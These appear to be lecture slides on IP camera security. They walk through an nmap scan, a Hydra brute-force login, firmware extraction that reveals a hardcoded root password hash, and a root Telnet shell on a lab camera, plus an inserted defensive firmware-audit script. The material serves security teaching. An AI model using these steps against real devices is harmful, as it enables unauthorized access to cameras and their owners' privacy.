IoT Security
Internet of Things
Computer Architecture
IP Camera Discovery
Author: Prof Bill Buchanan
Web: Asecuritysite.com


Introduction

Traditional connecting of “things”

Computers: (Windows XP/7/8), Mac OS X
Servers: (Windows 2008, Linux)
Wired connections
Internet connection

Architecture

Servers (Linux, Windows 2008, etc)
Computers: (Windows XP/7/8), Mac OS X
CPU (Intel x86, Intel x64), e.g. 3GHz
Dynamic Memory (16GB)
Storage (1TB)

NVRAM (4MB)
ROM (24KB)
SDRAM (256MB)
CPU (MIPS 24K V4.12 @384 MHz)
Embedded device

Features:
Highly secure.
Unique passwords.
No default passwords.
Firewalls/IDS/etc.
Auto patches.
Well tested.

NVRAM (16GB)
ARM (Cortex-A15 CPU - ARMv7)/Qualcomm Snapdragon (ARMv8)
Smart phone
ARMv7/ARMv8: Quad-core: 1.7GHz

Devices: Embedded OS

Introduction to Computer Architecture


IP Camera

IP Camera Architecture

Ralink MIPS 24K V4.12, 384MHz
Linux version 2.6.21
Web server: HTTP (80)
Telnetd: Telnet (23)
BusyBox BIN: BusyBox (300 commands, L/W Linux)
Firmware (NVRAM)
Ethernet (DHCP)

Device Status

Device Firmware Version 51.3.0.152
Device Embeded Web UI Version 0.0.1.6
Alias IPCAM
MAC 78:A5:DD:08:FC:DC
Wifi MAC 78:A5:DD:08:FC:DD

Method:

1. NMAP ports (192.168.0.2).
2. Try manual login (HTTP and Telnet).
3. Hydra login (HTTP and Telnet).
4. Kali – View BIN – binwalk 51.3.0.152.bin
5. Kali – Extract System - dd bs=1 skip=36 if=51.3.0.152.bin of=image.zip
6. Kali – unzip image.zip … review for Admin password
7. XSS Vulnerability.

root@kali:~/system/system/bin# nmap 192.168.0.2
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-04 12:52 GMT
Nmap scan report for Unknown (192.168.0.2)
Host is up (0.0062s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
8600/tcp open  asterix
MAC Address: 78:A5:DD:08:FC:DC (Shenzhen Smarteye Digital Electronics Co.)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

billbuchanan@Bills-MacBook-Pro:~/webcam$ hydra -V -W 1 -t 1 -L user.txt -P pass.txt 192.168.0.2 http
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-04 12:59:18
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.0.2 - login "root" - pass "password" - 1 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "default" - 2 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "none" - 3 of 30 [child 0]
...
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123" - 16 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "12345" - 17 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123456" - 18 of 30 [child 0]
[80][www] host: 192.168.0.2 login: admin password: 123456
[ATTEMPT] target 192.168.0.2 - login "user" - pass "password" - 19 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "default" - 20 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "none" - 21 of 30 [child 0]

Examining firmware

root@kali:~# binwalk 51.3.0.152.bin
DECIMAL  HEX      DESCRIPTION
-------------------------------------------------------------------------------------------------------------------
36       0x24     Zip archive data, at least v1.0 to extract, name: "system/"
101      0x65     Zip archive data, at least v1.0 to extract, name: "system/Wireless/"
175      0xAF     Zip archive data, at least v1.0 to extract, name: "system/system/"
247      0xF7     Zip archive data, at least v1.0 to extract, name: "system/system/drivers/"
327      0x147    Zip archive data, at least v1.0 to extract, name: "system/system/bin/"
403      0x193    Zip archive data, at least v2.0 to extract, compressed size: 25717, uncompressed size: 108204, name: "system/system/bin/daemon.v5.5"
26207    0x665F   Zip archive data, at least v2.0 to extract, compressed size: 167785, uncompressed size: 685920, name: "system/system/bin/mailx"
194073   0x2F619  Zip archive data, at least v2.0 to extract, compressed size: 238464, uncompressed size: 780068, name: "system/system/bin/encoder"
432620   0x699EC  Zip archive data, at least v2.0 to extract, compressed size: 3106, uncompressed size: 8372, name: "system/system/bin/gmail_thread"
435814   0x6A666  Zip archive data, at least v2.0 to extract, compressed size: 3075, uncompressed size: 8260, name: "system/system/bin/cmd_thread"
438975   0x6B2BF  Zip archive data, at least v2.0 to extract, compressed size: 13149, uncompressed size: 45876, name: "system/system/bin/ssmtp"
452205   0x6E66D  Zip archive data, at least v2.0 to extract, compressed size: 24681, uncompressed size: 104800, name: "system/system/bin/daemon.v5.3"
476973   0x7472D  Zip archive data, at least v2.0 to extract, compressed size: 84641, uncompressed size: 170920, name: "system/system/bin/unzip1"
561696   0x89220  Zip archive data, at least v2.0 to extract, compressed size: 15429, uncompressed size: 43616, name: "system/system/bin/upnpc-static"
577213   0x8CEBD  Zip archive data, at least v2.0 to extract, compressed size: 35607, uncompressed size: 95132, name: "system/system/bin/ftp"
612899   0x95A23  Zip archive data, at least v1.0 to extract, name: "system/system/lib/"
612975   0x95A6F  Zip archive data, at least v1.0 to extract, name: "system/www/"
613044   0x95AB4  Zip archive data, at least v1.0 to extract, name: "system/init/"
613114   0x95AFA  Zip archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 203, name: "system/init/ipcam.sh"
615021   0x9626D  End of Zip archive

root@kali:~# cat daemon.v5.5
ps > /tmp/gps.txt/tmp/gps.txtrfopen failed
encoderreboot/system/system/bin/encoder &/etc/passwdwbroot:LSiuY7pOmZG2s:0:0:Adminstrator:/:/bin/sh/etc/grouproot:x:0:adminsystem:%2x-%2x-%2x
this isn't system file
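The binwalk, dd, unzip and review steps of the method can be folded into one repeatable check that a vendor or device owner runs over an image before it ships. This is an added example, not code from the original slides: `audit_firmware`, `build_sample_image` and the sample image (36-byte header, placeholder password field) are constructed for illustration, and it assumes the layout shown on the slide, a vendor header followed by a plain ZIP archive.

```python
import io
import re
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"
# passwd(5) fields: name:password:uid:gid:gecos:home:shell
PASSWD_ENTRY = re.compile(
    rb"([A-Za-z_][\w.-]*):([^:\s]*):(\d+):(\d+):[^:\n]*:(/[^:\s]*):(/[\w/]+)")
LOCKED = {b"", b"x", b"*", b"!"}  # shadowed or disabled password fields


def audit_firmware(image: bytes):
    """Return (zip_offset, findings) for a vendor-header + ZIP firmware image."""
    offset = image.find(ZIP_LOCAL_HEADER)  # same boundary as the dd skip= value
    if offset < 0:
        raise ValueError("no ZIP local file header found in image")
    findings = []
    with zipfile.ZipFile(io.BytesIO(image[offset:])) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            # Scan raw bytes: the entry may sit inside a compiled binary
            for m in PASSWD_ENTRY.finditer(archive.read(info)):
                field = m.group(2)
                if field in LOCKED:
                    continue
                findings.append({
                    "member": info.filename,
                    "user": m.group(1).decode(),
                    "uid": int(m.group(3)),
                    "shell": m.group(6).decode(),
                    # 13 characters with no $id$ prefix is traditional DES crypt
                    "legacy_des": len(field) == 13 and not field.startswith(b"$"),
                })
    return offset, findings


def build_sample_image() -> bytes:
    """Constructed sample: 36-byte header, then a ZIP with a placeholder entry."""
    daemon = (b"\x7fELF\x00/etc/passwd\x00wb\x00"
              b"root:AAconstructed:0:0:Administrator:/:/bin/sh\n\x00"
              b"/etc/group\x00root:x:0:admin\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("system/", b"")
        z.writestr("system/system/bin/daemon", daemon)
        z.writestr("system/init/ipcam.sh", b"#!/bin/sh\n/system/system/bin/daemon &\n")
    return b"\x00" * 36 + buf.getvalue()
```

Any finding with `uid` 0 and a login shell means every unit flashed with that image shares one administrator credential, which is the condition the Telnet login on the next slide relies on.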

IP Camera Telnet connection

billbuchanan@Bills-MacBook-Pro:~/webcam$ telnet 192.168.0.2
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
(none) login: root
Password: 123456
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
var tmp sys proc mnt lib home etc bin
usr system sbin param media init etc_ro dev
# cd system
# ls
system daemon Wireless init www
# cd www
# ls
mime.types config.htm ftp.htm
status.htm Deutsch jpeg.html
user.htm index1.htm snapshot.htm
traditional_chinese test_mail.htm alias.htm
ip.htm system-b.ini appversion.txt
french recordplay.htm sensordata.bin
upnp.htm params_backup.cgi ptz.htm
ap.htm multidev.htm recordsch.htm
